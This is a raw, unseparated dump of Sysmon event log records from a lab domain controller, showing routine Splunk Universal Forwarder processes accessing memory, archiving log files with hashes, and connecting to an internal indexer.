AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203006Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.564{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26B73DF762985FFA773A231376A20BC4,SHA256=487EE796B6F23F5846DD29F414FD0A984C91FBE3AAE0352C865568EC463504B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203005Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.189{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E986-6040-3A4E-00000000AD01}4932C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203004Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.189{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203003Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.189{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203002Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.189{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203001Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.189{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203000Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.189{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E986-6040-3A4E-00000000AD01}4932C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202999Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.189{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E986-6040-3A4E-00000000AD01}4932C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202998Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.190{5ABCFE62-E986-6040-3A4E-00000000AD01}4932C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002203025Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.658{5ABCFE62-E987-6040-3C4E-00000000AD01}69683744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203024Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.564{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76C2E2AF545D847DAEFEA38A64D2B84F,SHA256=04EB27E1A894573170574A877CE4D77BEE36838D473E41BC7B8D1E69D7B1302D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203023Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.533{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E987-6040-3C4E-00000000AD01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203022Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.533{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203021Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.533{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203020Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.533{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203019Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.533{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203018Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.533{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E987-6040-3C4E-00000000AD01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203017Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.533{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E987-6040-3C4E-00000000AD01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203016Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.534{5ABCFE62-E987-6040-3C4E-00000000AD01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203015Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:03.205{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0596F301A20266D4CE844E1BDAD15277,SHA256=900F3F24EB98BA329D70638E9C9B2210175986061DED0FC344B652DDBBCEA8A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203027Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:04.580{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAD8ABAE6F78A5C7EF69C18EEDACC219,SHA256=E8EDEA35D32D0BACCEF4D9019E06BCC1B07928C6F41734FBE7A946BF2718F734,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203026Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:04.549{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=16245A76DFF441AD7E1F41679662F249,SHA256=9721B77ED9EF114D86390721CEBDF5C22154F6D5E79482E61D516BE0A09B224A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203028Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:05.580{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBC22AEABFC01D979C1585E8BDDE7994,SHA256=05DE39E4159744E22AF8C4838689D5D096E4A65689FD7272D9D7A1B4925BB99C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203031Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:06.939{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203030Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.072{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60690-false10.0.1.12-8000- 23542300x80000000000000002203029Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:06.596{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1B699890FDD37E1AE7B1E3B44E1A79B,SHA256=5D466C9C51ACAB79E06374F9492ACAA18595D6375972ACA9F40D5CFF85245426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203033Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:07.971{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18A2BE7DA90BB9D6480D2F62AA14381D,SHA256=6DFD05FA7C3B62FD3A56892636002CFA3B155E77437C2F0405EA64E0707E9317,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203032Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:07.596{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6B80081575BB0C06F29090FF0FC1522,SHA256=9D7A8AD5CB95EB5990CB69B845562F3619CA9B09C041E7927C0DD9970E02C3B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203035Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:04.760{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60691-false10.0.1.12-8089- 23542300x80000000000000002203034Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:08.596{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC822277BF72A9C04AC4D31A4DC64B37,SHA256=D6636F131F70491E9BF15568FF9837B08DFC50F066347431EA6B483635AE9992,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203036Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:09.611{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B891B74608B3F1870BCA5D921098E48,SHA256=B3F7E916307247DDB9908F70AB995E4931D9FB46F6519ABAADB7E6E16886B4B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203037Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:10.627{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D09977FF670243B1541797ABF07B46E4,SHA256=13C32048B331442041AF65AC92B68A0729DFBF6BD184D26914C1F766791B7510,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203040Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:07.885{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60692-false10.0.1.12-8000- 23542300x80000000000000002203039Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:11.642{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419B8E5CA1D89D3B16D6AC580A673D1D,SHA256=87AFB7B0794BDE60DD8DB99AD5FE9C17853555E4A031C2F50152E7DBA669004D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203038Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:11.267{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF1B0D7CCF828DB901F179D41071F644,SHA256=CE70C03D588269F23DE350A20BE0C69C8B7AC52E47B159EC153A06006AFCBB0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203041Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:12.658{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64BC582D33F65067D057AB17AFA00C65,SHA256=495541C982616CFCD36B58AE8D08407818A5B9D01204FB1175A65A02E65CF7B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203042Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:13.674{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAD7EA82044D254F5CC060DE86C49494,SHA256=6E2C6126946CDB1F9EDF5468BFAC57DAB283EE079FD850FF604F8DD87EB34ADE,IMPHASH=00000000000000000000000000000000falsetrue 